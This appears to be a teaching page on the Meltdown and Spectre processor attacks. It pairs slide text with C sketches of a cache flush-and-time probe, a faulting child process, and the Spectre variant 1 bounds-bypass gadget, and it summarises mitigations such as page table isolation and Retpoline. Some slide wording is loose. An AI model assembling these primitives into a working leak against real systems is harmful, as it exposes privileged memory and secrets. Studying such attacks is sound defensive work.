



The document discusses the Meltdown and Spectre attacks, which exploit side channels and speculative execution in modern processors. Meltdown allows reading privileged memory via out-of-order execution. Spectre uses branch prediction to induce misspeculation that leaks data. Mitigations include kernel page table isolation for Meltdown and techniques like Retpoline, IBRS, and IBPB to restrict speculation for Spectre variants 1 and 2. Future exploits may target SIMD and larger registers with more advanced prediction.

![Meltdown

➢ Exploiting out-of-order execution

1. You need code like this (where i is 200000, an out-of-bounds index):
    if (array[i] < 200) a = i + b;
    else a = array[i];
2. Speculative execution will cause the CPU to run code that depends on array[i] before the access has been validated.
3. Clear the CPU cache (clflush() will do the job).
4. Execute your tool and read the memory back, timing every read.
5. Bytes that were fetched into the cache will be faster to read than bytes that were not.](https://image.slidesharecdn.com/meltdown-180223082451/85/Meltdown-Spectre-attacks-3-320.jpg)
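The flush, time, and compare steps above can be sketched in C roughly as follows. This is a minimal sketch under stated assumptions, not the tool the slides refer to: the names `flush_probe`, `time_probe`, and `fastest_slot` and the constants `SLOTS` and `STRIDE` are hypothetical, introduced only for illustration. The flush and timing paths use the x86 intrinsics `_mm_clflush` and `__rdtscp`; on other architectures the sketch still compiles but measures nothing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>          /* _mm_clflush, __rdtscp */
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0
#endif

#define SLOTS  256              /* assumption: one probe slot per byte value */
#define STRIDE 4096             /* assumption: slots one page apart */

/* Step 3: evict every probe slot from the cache. */
void flush_probe(const uint8_t *probe) {
#if HAVE_X86_TIMING
    for (size_t s = 0; s < SLOTS; s++)
        _mm_clflush(probe + s * STRIDE);
#else
    (void)probe;                /* no portable flush: nothing to do here */
#endif
}

/* Step 4: time one read of each slot, in timestamp-counter cycles. */
void time_probe(const uint8_t *probe, uint64_t cycles[SLOTS]) {
    for (size_t s = 0; s < SLOTS; s++) {
#if HAVE_X86_TIMING
        unsigned int aux = 0;
        volatile const uint8_t *p = probe + s * STRIDE;
        uint64_t start = __rdtscp(&aux);
        (void)*p;               /* the timed read */
        uint64_t end = __rdtscp(&aux);
        cycles[s] = end - start;
#else
        (void)probe;
        cycles[s] = 0;          /* no timing source in this sketch */
#endif
    }
}

/* Step 5: the slot that reads fastest was the cached one.
 * Returns its index, or -1 if no slot is faster than `threshold`. */
int fastest_slot(const uint64_t cycles[SLOTS], uint64_t threshold) {
    assert(cycles != NULL);
    int best = -1;
    uint64_t best_cycles = threshold;
    for (int s = 0; s < SLOTS; s++) {
        if (cycles[s] < best_cycles) {
            best_cycles = cycles[s];
            best = s;
        }
    }
    return best;
}
```

A caller would run `flush_probe`, trigger the speculative access, run `time_probe`, and pass the result to `fastest_slot`. The threshold that separates a cache hit from a miss varies by machine and has to be calibrated.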

![Meltdown

➢ Because of out-of-order execution

1. The memory pointed to by array[i] will be fetched by the CPU into the L3 cache.
2. But because array[i] points to a memory address outside the process's region, the child process that performs the access will die with SIGSEGV.
3. Now the parent can examine all the memory of the child, and it does so by timing every read from memory.
4. Data that is in the cache is faster to read :)](https://image.slidesharecdn.com/meltdown-180223082451/85/Meltdown-Spectre-attacks-4-320.jpg)
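The parent and child arrangement described above can be illustrated with a small POSIX sketch. It shows only the process structure: a child performs a forbidden read and is killed, while the parent survives and would be free to run its timing loop afterwards. The function name `run_faulting_child` is hypothetical. A page mapped with `PROT_NONE` stands in for "memory outside the process's region", which is an assumption made so the fault is reproducible. Linux reports the fault as SIGSEGV; some other systems report SIGBUS.

```c
#define _DEFAULT_SOURCE         /* for MAP_ANONYMOUS on glibc in strict modes */
#include <assert.h>
#include <signal.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Forks a child that reads a forbidden page.
 * Returns the signal that killed the child, 0 if it exited normally,
 * or -1 if setup failed. */
int run_faulting_child(void) {
    long page_size = sysconf(_SC_PAGESIZE);
    assert(page_size > 0);

    /* Stand-in for an address the process is not allowed to read. */
    void *page = mmap(NULL, (size_t)page_size, PROT_NONE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    volatile uint8_t *forbidden = page;

    pid_t pid = fork();
    if (pid < 0) {
        munmap(page, (size_t)page_size);
        return -1;
    }
    if (pid == 0) {
        uint8_t value = *forbidden;   /* the child faults on this read */
        _exit(value);                 /* not reached */
    }

    /* Parent: wait for the child, then report how it ended. */
    int status = 0;
    pid_t waited = waitpid(pid, &status, 0);
    munmap(page, (size_t)page_size);
    if (waited < 0)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}
```

In a real attack the parent's timing measurements would follow the `waitpid` call. Here the return value only confirms that the child died on the faulting read.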



![Spectre Variant 1

struct array { u_long length; u_char data[]; };
struct array *arr1 = ...; // small array
struct array *arr2 = ...; // array of size 0x400
// >0x400 (OUT OF BOUNDS!)
u_long u = untrusted_offset_from_caller;
if (u < arr1->length) {
    u_char val = arr1->data[u];
    u_long i2 = ((val&1)*0x100)+0x200;
    if (i2 < arr2->length) {
        u_char val2 = arr2->data[i2];
    }
}](https://image.slidesharecdn.com/meltdown-180223082451/85/Meltdown-Spectre-attacks-8-320.jpg)
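To make the slide's snippet concrete, here is a compilable sketch of the same gadget. It runs only the architectural (in-bounds) behaviour and shows how the second index encodes one bit of the first load. The helpers `array_new`, `second_index`, `gadget`, and `leaked_bit` are hypothetical names added for illustration, and the array contents are whatever the caller writes. The slide elides how the arrays are set up, and this sketch does not fill that in.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

struct array {
    unsigned long length;
    unsigned char data[];       /* flexible array member, as on the slide */
};

/* Hypothetical helper: allocate an array with n zeroed data bytes. */
struct array *array_new(unsigned long n) {
    struct array *a = calloc(1, sizeof *a + n);
    if (a != NULL)
        a->length = n;
    return a;
}

/* The slide's index computation: bit 0 of val selects 0x200 or 0x300. */
unsigned long second_index(unsigned char val) {
    return ((val & 1UL) * 0x100) + 0x200;
}

/* The slide's gadget. Architecturally both bounds checks hold.
 * Returns 1 if arr2 was read, 0 if a bounds check rejected the access. */
int gadget(const struct array *arr1, const struct array *arr2,
           unsigned long u) {
    assert(arr1 != NULL && arr2 != NULL);
    if (u < arr1->length) {
        unsigned char val = arr1->data[u];
        unsigned long i2 = second_index(val);
        if (i2 < arr2->length) {
            /* This load pulls arr2->data[i2] into the cache. */
            volatile unsigned char val2 = arr2->data[i2];
            (void)val2;
            return 1;
        }
    }
    return 0;
}

/* Attacker side: map the arr2 offset found in the cache to the leaked bit. */
int leaked_bit(unsigned long cached_offset) {
    return cached_offset == 0x300;
}
```

When the first check is mispredicted for an out-of-bounds `u`, the same two loads run speculatively. Whether offset 0x200 or 0x300 of `arr2->data` ends up cached then reveals bit 0 of the out-of-bounds byte, even though the architectural result is discarded.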